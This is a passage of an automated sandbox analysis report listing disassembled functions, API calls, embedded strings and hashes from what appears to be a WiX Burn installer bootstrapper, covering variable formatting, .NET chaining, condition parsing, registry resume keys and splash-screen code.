LeaveCriticalSection.KERNEL32(000002C0,00000000,00000000,00000000,00000000,00000000,00000001,?,000999BB,000002C0,?,00000000,00000000,000002C0,00000100,000002C0), ref: 00095B56

Strings

Failed to allocate record., xrefs: 00095917
Failed to get formatted length., xrefs: 00095A6D
Failed to allocate buffer for format string., xrefs: 000956CA
Failed to format record., xrefs: 00095B1A
Failed to append string., xrefs: 00095728
Failed to set variable value., xrefs: 0009596D
Failed to append placeholder., xrefs: 00095959
variable.cpp, xrefs: 0009590A, 0009592B, 00095984, 000959D0, 00095A60, 00095A95, 00095B0D
*****, xrefs: 00095820
Failed to copy string., xrefs: 00095B3A
Failed to reallocate variable array., xrefs: 00095938
Failed to allocate variable array., xrefs: 00095991
Failed to set record string., xrefs: 00095AA2
[%d], xrefs: 0009586F
Failed to allocate string., xrefs: 00095AD1
Failed to get variable name., xrefs: 00095998
Failed to determine variable visibility: '%ls'., xrefs: 00095946
Failed to format placeholder string., xrefs: 00095963
Failed to set record format string., xrefs: 000959DD

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: CriticalSection$EnterLeave_wcschrlstrlen
String ID: *****$Failed to allocate buffer for format string.$Failed to allocate record.$Failed to allocate string.$Failed to allocate variable array.$Failed to append placeholder.$Failed to append string.$Failed to copy string.$Failed to determine variable visibility: '%ls'.$Failed to format placeholder string.$Failed to format record.$Failed to get formatted length.$Failed to get variable name.$Failed to reallocate variable array.$Failed to set record format string.$Failed to set record string.$Failed to set variable value.$[%d]$variable.cpp
API String ID: 1026845265-2050445661
Opcode ID: a4e96ed540cbe86d7f650a83ee9f3f1fae4665aac4dab356d591ef5ab9683987
Instruction ID: e2f2de3b3d92c2d51bc103974d5a43db3c38584989e50715c41f973780b62d8e
Opcode Fuzzy Hash: a4e96ed540cbe86d7f650a83ee9f3f1fae4665aac4dab356d591ef5ab9683987
Instruction Fuzzy Hash: 43F1B071D00729EBDF229FA58C41AEFBBA9EF04751F11412AFD14AB241D7349E01EBA1

Function 000BCC24 Relevance: 40.5, APIs: 12, Strings: 11, Instructions: 235synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 000938D4: GetProcessHeap.KERNEL32(?,000001C7,?,00092284,000001C7,00000001,80004005,8007139F,?,?,000D015F,8007139F,?,00000000,00000000,8007139F), ref: 000938E5
Part of subcall function 000938D4: RtlAllocateHeap.NTDLL(00000000,?,00092284,000001C7,00000001,80004005,8007139F,?,?,000D015F,8007139F,?,00000000,00000000,8007139F), ref: 000938EC

CreateEventW.KERNEL32(00000000,00000000,00000000,?,00000000,00000018,00000001,?,00000000,?,?,000BD34C,?,?,?), ref: 000BCC6A
GetLastError.KERNEL32(?,?,000BD34C,?,?,?), ref: 000BCC77
ReleaseMutex.KERNEL32(?), ref: 000BCEDF

Strings

failed to copy event name to shared memory structure., xrefs: 000BCE3D
failed to allocate memory for event name, xrefs: 000BCCBD
failed to allocate memory for mutex name, xrefs: 000BCD2C
Failed to memory map cabinet file: %ls, xrefs: 000BCDCB
%ls_mutex, xrefs: 000BCD18
Failed to create mutex: %ls, xrefs: 000BCD79
NetFxChainer.cpp, xrefs: 000BCC46, 000BCC98, 000BCCFD, 000BCD6C, 000BCDBE, 000BCE06
Failed to create event: %ls, xrefs: 000BCD0A
%ls_send, xrefs: 000BCCA9
Failed to MapViewOfFile for %ls., xrefs: 000BCE13
Failed to allocate memory for NetFxChainer struct., xrefs: 000BCC50

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: Heap$AllocateCreateErrorEventLastMutexProcessRelease
String ID: %ls_mutex$%ls_send$Failed to MapViewOfFile for %ls.$Failed to allocate memory for NetFxChainer struct.$Failed to create event: %ls$Failed to create mutex: %ls$Failed to memory map cabinet file: %ls$NetFxChainer.cpp$failed to allocate memory for event name$failed to allocate memory for mutex name$failed to copy event name to shared memory structure.
API String ID: 3944734951-2991465304
Opcode ID: 1f1b66d68325b85e3f7c5b8a19e255f67aa95371fa5069ee19f1eec85a0bebef
Instruction ID: 3c46f9b362886ce3849f49f2ebc1c1aad35e8a995d767d3b48c416d0aefdbf0c
Opcode Fuzzy Hash: 1f1b66d68325b85e3f7c5b8a19e255f67aa95371fa5069ee19f1eec85a0bebef
Instruction Fuzzy Hash: 5171C176A41716FBE7219B658C49FEBBAE8EF04350F014126FE18AB652D734CD0096F4

Function 0009E936 Relevance: 40.5, APIs: 4, Strings: 19, Instructions: 231COMMON

Download Yara Rule

APIs

Part of subcall function 000D31C7: VariantInit.OLEAUT32(?), ref: 000D31DD
Part of subcall function 000D31C7: SysAllocString.OLEAUT32(?), ref: 000D31F9
Part of subcall function 000D31C7: VariantClear.OLEAUT32(?), ref: 000D3280
Part of subcall function 000D31C7: SysFreeString.OLEAUT32(00000000), ref: 000D328B

CompareStringW.KERNEL32(0000007F,00000000,000000FF,000000FF,Detect,000000FF,?,000DCA64,?,?,Action,?,?,?,00000000,?), ref: 0009EA07
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,Upgrade,000000FF), ref: 0009EA51

Strings

Addon, xrefs: 0009EA8E
Failed to get RelatedBundle nodes, xrefs: 0009E966
RelatedBundle, xrefs: 0009E944
Failed to resize Detect code array in registration, xrefs: 0009EB22
Invalid value for @Action: %ls, xrefs: 0009EB46
Failed to get @Action., xrefs: 0009EB5D
Upgrade, xrefs: 0009EA44
Failed to get next RelatedBundle element., xrefs: 0009EB64
Failed to get RelatedBundle element count., xrefs: 0009E98B
comres.dll, xrefs: 0009EA1A
Detect, xrefs: 0009E9F8
Patch, xrefs: 0009EAD1
version.dll, xrefs: 0009EA64
Failed to resize Addon code array in registration, xrefs: 0009EB30
Failed to resize Patch code array in registration, xrefs: 0009EB37
Action, xrefs: 0009E9C4
Failed to resize Upgrade code array in registration, xrefs: 0009EB29
Failed to get @Id., xrefs: 0009EB56
cabinet.dll, xrefs: 0009EAAE

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: String$CompareVariant$AllocClearFreeInit
String ID: Action$Addon$Detect$Failed to get @Action.$Failed to get @Id.$Failed to get RelatedBundle element count.$Failed to get RelatedBundle nodes$Failed to get next RelatedBundle element.$Failed to resize Addon code array in registration$Failed to resize Detect code array in registration$Failed to resize Patch code array in registration$Failed to resize Upgrade code array in registration$Invalid value for @Action: %ls$Patch$RelatedBundle$Upgrade$cabinet.dll$comres.dll$version.dll
API String ID: 702752599-259800149
Opcode ID: d981fae9d73967896f6de774fa09b013c2276cd1455fca3ede1de811d590f3e5
Instruction ID: 86d32b51d43c590020d94794aa84e06d0a732751ab4d2014a4aeb2ff466be552
Opcode Fuzzy Hash: d981fae9d73967896f6de774fa09b013c2276cd1455fca3ede1de811d590f3e5
Instruction Fuzzy Hash: 7571BF74A45666BFCB20CA94CC42EAEB7B4FF04724F204255F916BB681D731AE10EB90

Function 00098E48 Relevance: 37.2, APIs: 8, Strings: 13, Instructions: 433COMMON

Download Yara Rule

APIs

GetStringTypeW.KERNEL32(00000001,56000DDB,00000001,?,00099801,?,00000000,00000000), ref: 00098E8D

Strings

Failed to parse condition "%ls". Invalid version format, at position %d., xrefs: 0009910C
Failed to parse condition "%ls". Constant too big, at position %d., xrefs: 0009924D
AND, xrefs: 00099187
Failed to parse condition "%ls". Unterminated literal at position %d., xrefs: 00098F6F
Failed to parse condition "%ls". Identifier cannot start at a digit, at position %d., xrefs: 0009928D
@, xrefs: 00098E93
Failed to parse condition "%ls". Unexpected '~' operator at position %d., xrefs: 000992C8
Failed to set symbol value., xrefs: 00098F35
NOT, xrefs: 000991A7
Failed to parse condition "%ls". Version can have a maximum of 4 parts, at position %d., xrefs: 000990AF
Failed to parse condition "%ls". Unexpected character at position %d., xrefs: 0009903A
-, xrefs: 00098FF1
condition.cpp, xrefs: 00098F5C, 00099027, 0009909C, 000990F9, 0009923A, 0009927A, 000992B5

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: StringType
String ID: -$@$AND$Failed to parse condition "%ls". Constant too big, at position %d.$Failed to parse condition "%ls". Identifier cannot start at a digit, at position %d.$Failed to parse condition "%ls". Invalid version format, at position %d.$Failed to parse condition "%ls". Unexpected '~' operator at position %d.$Failed to parse condition "%ls". Unexpected character at position %d.$Failed to parse condition "%ls". Unterminated literal at position %d.$Failed to parse condition "%ls". Version can have a maximum of 4 parts, at position %d.$Failed to set symbol value.$NOT$condition.cpp
API String ID: 4177115715-3640792234
Opcode ID: 708a302dea194569bd8667665c2a927d68a84e60452681f26ca48ee40a330eb7
Instruction ID: 64aabd81638d1b5a4acb0fe30b4a837341f39d02aa607f4d04969400f441a9a6
Opcode Fuzzy Hash: 708a302dea194569bd8667665c2a927d68a84e60452681f26ca48ee40a330eb7
Instruction Fuzzy Hash: 39E1F271644205EBDF218F58C889BBE7BA9FB05710F14809AF9059E2C5D7B5CAC1EBA0

Function 000A44E7 Relevance: 36.9, APIs: 10, Strings: 11, Instructions: 181fileCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,8000FFFF,feclient.dll,?,000A49FE,000DB4D8,?,feclient.dll,00000000,?,?), ref: 000A44FE
ReadFile.KERNEL32(feclient.dll,feclient.dll,00000004,?,00000000,?,000A49FE,000DB4D8,?,feclient.dll,00000000,?,?), ref: 000A451F
GetLastError.KERNEL32(?,000A49FE,000DB4D8,?,feclient.dll,00000000,?,?), ref: 000A4525
WriteFile.KERNEL32(feclient.dll,?,00000004,000A49FE,00000000,?,000A49FE,000DB4D8,?,feclient.dll,00000000,?,?), ref: 000A468E
GetLastError.KERNEL32(?,000A49FE,000DB4D8,?,feclient.dll,00000000,?,?), ref: 000A4698

Strings

Failed to allocate buffer for verification secret., xrefs: 000A459C
Failed to read verification process id from parent pipe., xrefs: 000A466C
msasn1.dll, xrefs: 000A4636
feclient.dll, xrefs: 000A44ED, 000A451D, 000A451E, 000A45B2, 000A4637, 000A468D
Verification secret from parent is too big., xrefs: 000A4580
Failed to inform parent process that child is running., xrefs: 000A46C6
Failed to read size of verification secret from parent pipe., xrefs: 000A4553
Verification secret from parent does not match., xrefs: 000A4621
Failed to read verification secret from parent pipe., xrefs: 000A45E7
pipe.cpp, xrefs: 000A4549, 000A4574, 000A45DD, 000A4615, 000A4662, 000A46BC, 000A46FC
Verification process id from parent does not match., xrefs: 000A4708

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: ErrorFileLast$CurrentProcessReadWrite
String ID: Failed to allocate buffer for verification secret.$Failed to inform parent process that child is running.$Failed to read size of verification secret from parent pipe.$Failed to read verification process id from parent pipe.$Failed to read verification secret from parent pipe.$Verification process id from parent does not match.$Verification secret from parent does not match.$Verification secret from parent is too big.$feclient.dll$msasn1.dll$pipe.cpp
API String ID: 3008747291-452622383
Opcode ID: b71c4a760cefa575c1837a12e43c3989e9ab31a0f3e27d1792ec42b7be312e50
Instruction ID: abe6200a0d8ddbb5bb5ea1a61b8709b5610b75dca693c704407bece9de74171b
Opcode Fuzzy Hash: b71c4a760cefa575c1837a12e43c3989e9ab31a0f3e27d1792ec42b7be312e50
Instruction Fuzzy Hash: AE51D476E40315BBEB219AE68C85FAFB6E8AF46710F110126FE11FB190D7748E0096E1

Function 000B25AF Relevance: 36.9, APIs: 3, Strings: 18, Instructions: 145COMMON

Download Yara Rule

Strings

Failed to get @RepairArguments., xrefs: 000B263E
Failed to parse command lines., xrefs: 000B273B
Protocol, xrefs: 000B2676
Failed to get @UninstallArguments., xrefs: 000B261C
Failed to get @DetectCondition., xrefs: 000B25D8
InstallArguments, xrefs: 000B25E9
DetectCondition, xrefs: 000B25C7
netfx4, xrefs: 000B26C8
Failed to get @Protocol., xrefs: 000B2727
Repairable, xrefs: 000B264F
Invalid protocol type: %ls, xrefs: 000B270F
Failed to get @InstallArguments., xrefs: 000B25FA
none, xrefs: 000B26E9
Failed to get @Repairable., xrefs: 000B2668
Failed to parse exit codes., xrefs: 000B26BF
burn, xrefs: 000B2693
RepairArguments, xrefs: 000B262D
UninstallArguments, xrefs: 000B260B

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: StringVariant$AllocClearFreeInit
String ID: DetectCondition$Failed to get @DetectCondition.$Failed to get @InstallArguments.$Failed to get @Protocol.$Failed to get @RepairArguments.$Failed to get @Repairable.$Failed to get @UninstallArguments.$Failed to parse command lines.$Failed to parse exit codes.$InstallArguments$Invalid protocol type: %ls$Protocol$RepairArguments$Repairable$UninstallArguments$burn$netfx4$none
API String ID: 760788290-1911311241
Opcode ID: 3e9dfacd6763817d577fdff8603e1ccfc6e46a3128b3987cfdbf226da1337ca8
Instruction ID: cf864630a9094b4d798ed8f0035d17bb7ac95f797698638ef97cedfd25f20c03
Opcode Fuzzy Hash: 3e9dfacd6763817d577fdff8603e1ccfc6e46a3128b3987cfdbf226da1337ca8
Instruction Fuzzy Hash: 1B41ED32BC87A6BAC72561618C42FEEB65C5B15730F210311FE21BA3D1CB64BD0052E6

Function 000B1970 Relevance: 35.2, APIs: 4, Strings: 16, Instructions: 212COMMON

Download Yara Rule

APIs

Part of subcall function 000938D4: GetProcessHeap.KERNEL32(?,000001C7,?,00092284,000001C7,00000001,80004005,8007139F,?,?,000D015F,8007139F,?,00000000,00000000,8007139F), ref: 000938E5
Part of subcall function 000938D4: RtlAllocateHeap.NTDLL(00000000,?,00092284,000001C7,00000001,80004005,8007139F,?,?,000D015F,8007139F,?,00000000,00000000,8007139F), ref: 000938EC

CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,success,000000FF,?,Type,00000000,?,?,00000000,?,00000001,?), ref: 000B1A77
CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,error,000000FF), ref: 000B1A95

Strings

exeengine.cpp, xrefs: 000B19F8
error, xrefs: 000B1A88
Code, xrefs: 000B1AE4
Failed to get @Code., xrefs: 000B1B57
Failed to select exit code nodes., xrefs: 000B199D
forceReboot, xrefs: 000B1AC2
Invalid exit code type: %ls, xrefs: 000B1B66
Failed to allocate memory for exit code structs., xrefs: 000B1A02
ExitCode, xrefs: 000B197E
Failed to get next node., xrefs: 000B1B7D
scheduleReboot, xrefs: 000B1AA4
Failed to get exit code node count., xrefs: 000B19C2
success, xrefs: 000B1A68
Type, xrefs: 000B1A4F
Failed to parse @Code value: %ls, xrefs: 000B1B50
Failed to get @Type., xrefs: 000B1B76

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: CompareHeapString$AllocateProcess
String ID: Code$ExitCode$Failed to allocate memory for exit code structs.$Failed to get @Code.$Failed to get @Type.$Failed to get exit code node count.$Failed to get next node.$Failed to parse @Code value: %ls$Failed to select exit code nodes.$Invalid exit code type: %ls$Type$error$exeengine.cpp$forceReboot$scheduleReboot$success
API String ID: 2664528157-1714101571
Opcode ID: 7edee1fc64e756e936203167a1ef50937c964295672fc960a216b0d94353ae6a
Instruction ID: 0c049ba5a2054088110c45f53ca841680123bcef2cca65df151a80e7bcab33df
Opcode Fuzzy Hash: 7edee1fc64e756e936203167a1ef50937c964295672fc960a216b0d94353ae6a
Instruction Fuzzy Hash: 3E61E475A05216BBCB209B55CC61EEEBBA8EF40720F604256F514BB2D1D7719E00D791

Function 0009F09D Relevance: 33.4, APIs: 3, Strings: 16, Instructions: 180registryCOMMON

Download Yara Rule

APIs

Part of subcall function 000D39CD: GetVersionExW.KERNEL32(?,?,00000000,?), ref: 000D3A1A

RegCloseKey.ADVAPI32(00000000,?,00020006,00020006,00000000,?,?,00000002,00000000,?,00000000,00000001,00000002), ref: 0009F2CB

Part of subcall function 000D1344: RegSetValueExW.ADVAPI32(?,?,00000000,00000004,?,00000004,SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce,?,0009F11A,00000005,Resume,?,?,?,00000002,00000000), ref: 000D1359

Strings

Failed to delete run key value., xrefs: 0009F25A
Installed, xrefs: 0009F132
SOFTWARE\Microsoft\Windows\CurrentVersion\Run, xrefs: 0009F0FA
Failed to write Installed value., xrefs: 0009F143
"%ls" /%ls, xrefs: 0009F172
Failed to create run key., xrefs: 0009F1AA
SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 0009F0AE
Failed to format resume command line for RunOnce., xrefs: 0009F186
Resume, xrefs: 0009F10F
Failed to write run key value., xrefs: 0009F1C8
Failed to write resume command line value., xrefs: 0009F1EA
registration.cpp, xrefs: 0009F250, 0009F29D
BundleResumeCommandLine, xrefs: 0009F1D5, 0009F267
Failed to write Resume value., xrefs: 0009F120
burn.runonce, xrefs: 0009F167
Failed to delete resume command line value., xrefs: 0009F2A7

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: CloseValueVersion
String ID: "%ls" /%ls$BundleResumeCommandLine$Failed to create run key.$Failed to delete resume command line value.$Failed to delete run key value.$Failed to format resume command line for RunOnce.$Failed to write Installed value.$Failed to write Resume value.$Failed to write resume command line value.$Failed to write run key value.$Installed$Resume$SOFTWARE\Microsoft\Windows\CurrentVersion\Run$SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce$burn.runonce$registration.cpp
API String ID: 2348918689-3140388177
Opcode ID: ea5a1ab80b34cee70ff72cdb108c7b6dfee38f3b09deefdfd40afa24771d21b7
Instruction ID: 4b91c4fdf235a3056249d92d18844206c3d44ee9c85db1bfedb741941bf6d9c0
Opcode Fuzzy Hash: ea5a1ab80b34cee70ff72cdb108c7b6dfee38f3b09deefdfd40afa24771d21b7
Instruction Fuzzy Hash: 8551D336A40766FADF216BA5CC42BFEBAA4AF04750F114136FE00FA191D771DE50A6D0

Function 000D7FEC Relevance: 31.8, APIs: 9, Strings: 9, Instructions: 309COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,http://appsyndication.org/2006/appsyn,000000FF,00000000,00000000,00000000,000002C0), ref: 000D8019
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,application,000000FF), ref: 000D8034
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,upgrade,000000FF), ref: 000D80D7
CompareStringW.KERNEL32(0000007F,00000000,00700079,000000FF,version,000000FF,00000018,000DB508,00000000), ref: 000D8116
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,exclusive,000000FF), ref: 000D8169
CompareStringW.KERNEL32(0000007F,00000000,000DB508,000000FF,true,000000FF), ref: 000D8187
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,version,000000FF), ref: 000D81BF
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,enclosure,000000FF), ref: 000D8303

Strings

apuputil.cpp, xrefs: 000D8226
true, xrefs: 000D8179
upgrade, xrefs: 000D80C9
version, xrefs: 000D8108, 000D81B1
application, xrefs: 000D8026
type, xrefs: 000D805F
exclusive, xrefs: 000D815B
http://appsyndication.org/2006/appsyn, xrefs: 000D800C
enclosure, xrefs: 000D82F1

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: CompareString
String ID: application$apuputil.cpp$enclosure$exclusive$http://appsyndication.org/2006/appsyn$true$type$upgrade$version
API String ID: 1825529933-3037633208
Opcode ID: abd7d167b2c08471f32b933ecf8f3724e88b344b1ea44c5ea6098e566ece3a87
Instruction ID: 28c7aa165d68b7eed740ed7ef16b57a513573ea4c9ba6af5e633e761a267bf7a
Opcode Fuzzy Hash: abd7d167b2c08471f32b933ecf8f3724e88b344b1ea44c5ea6098e566ece3a87
Instruction Fuzzy Hash: CFB1AE71904306ABDB609F54CC81F6A77F6AB44720F258656FA38EB3D2DB71E840CB20

Function 000D76A1 Relevance: 31.7, APIs: 8, Strings: 10, Instructions: 210COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,rel,000000FF,?,?,?,00000000), ref: 000D7703
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,href,000000FF), ref: 000D7727
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,length,000000FF), ref: 000D7746
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,title,000000FF), ref: 000D777D
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,type,000000FF), ref: 000D7798
SysFreeString.OLEAUT32(00000000), ref: 000D77C3
SysFreeString.OLEAUT32(00000000), ref: 000D7842
SysFreeString.OLEAUT32(00000000), ref: 000D788E

Strings

feclient.dll, xrefs: 000D7734
title, xrefs: 000D7770
href, xrefs: 000D771A
msasn1.dll, xrefs: 000D787C
rel, xrefs: 000D76F4
length, xrefs: 000D7739
comres.dll, xrefs: 000D7750
type, xrefs: 000D778B
msi.dll, xrefs: 000D782A
version.dll, xrefs: 000D77A7

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: String$Compare$Free
String ID: comres.dll$feclient.dll$href$length$msasn1.dll$msi.dll$rel$title$type$version.dll
API String ID: 318886736-3944986760
Opcode ID: 0d15388b172a1425526cd62efa748c65530cefbf73bbd404ca5bf9146dcfd754
Instruction ID: 2846ae0652df2da872163f954189b680db8cf6d622520d2a6d8476ecaa10a3dd
Opcode Fuzzy Hash: 0d15388b172a1425526cd62efa748c65530cefbf73bbd404ca5bf9146dcfd754
Instruction Fuzzy Hash: 87715535909219FBCF15DB94CC45EEEBBB4AF04720F204696E519A7291E731DE00EBA0

Function 000AE177 Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 144registryCOMMON

Download Yara Rule

APIs

Part of subcall function 000AE05E: LoadBitmapW.USER32(?,00000001), ref: 000AE094
Part of subcall function 000AE05E: GetLastError.KERNEL32 ref: 000AE0A0

LoadCursorW.USER32(00000000,00007F00), ref: 000AE1D8
RegisterClassW.USER32(?), ref: 000AE1EC
GetLastError.KERNEL32 ref: 000AE1F7
UnregisterClassW.USER32(WixBurnSplashScreen,?), ref: 000AE2FC
DeleteObject.GDI32(00000000), ref: 000AE30B

Strings

Failed to load splash screen., xrefs: 000AE1B0
splashscreen.cpp, xrefs: 000AE21B, 000AE284
Unexpected return value from message pump., xrefs: 000AE2E6
Failed to register window., xrefs: 000AE225
WixBurnSplashScreen, xrefs: 000AE1E5, 000AE2F7
Failed to create window., xrefs: 000AE28E

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: ClassErrorLastLoad$BitmapCursorDeleteObjectRegisterUnregister
String ID: Failed to create window.$Failed to load splash screen.$Failed to register window.$Unexpected return value from message pump.$WixBurnSplashScreen$splashscreen.cpp
API String ID: 164797020-2188509422
Opcode ID: 070dc2be336717a5de6b5cbb9f50149d5615f79973ec94f09d07adcf075ec1d0
Instruction ID: 3f99260e08162166731dab4dee642598446ca143a09e46c053117d7f943bbf47
Opcode Fuzzy Hash: 070dc2be336717a5de6b5cbb9f50149d5615f79973ec94f09d07adcf075ec1d0
Instruction Fuzzy Hash: 1641AF72A00659FFEB119BE5DD49EAEBBB9FF04300F110126FA05E6160D7749D10DBA1

Function 000B9BB3 Relevance: 30.0, APIs: 4, Strings: 13, Instructions: 230threadCOMMON

Download Yara Rule

APIs

WaitForMultipleObjects.KERNEL32(00000001,?,00000000,000000FF,00000001,00000000,00000000,?,000BBA53,00000001), ref: 000B9C18
GetLastError.KERNEL32(?,000BBA53,00000001), ref: 000B9D88
GetExitCodeThread.KERNEL32(00000001,00000000,?,000BBA53,00000001), ref: 000B9DC8
GetLastError.KERNEL32(?,000BBA53,00000001), ref: 000B9DD2

Strings

Failed to execute MSU package., xrefs: 000B9CCD
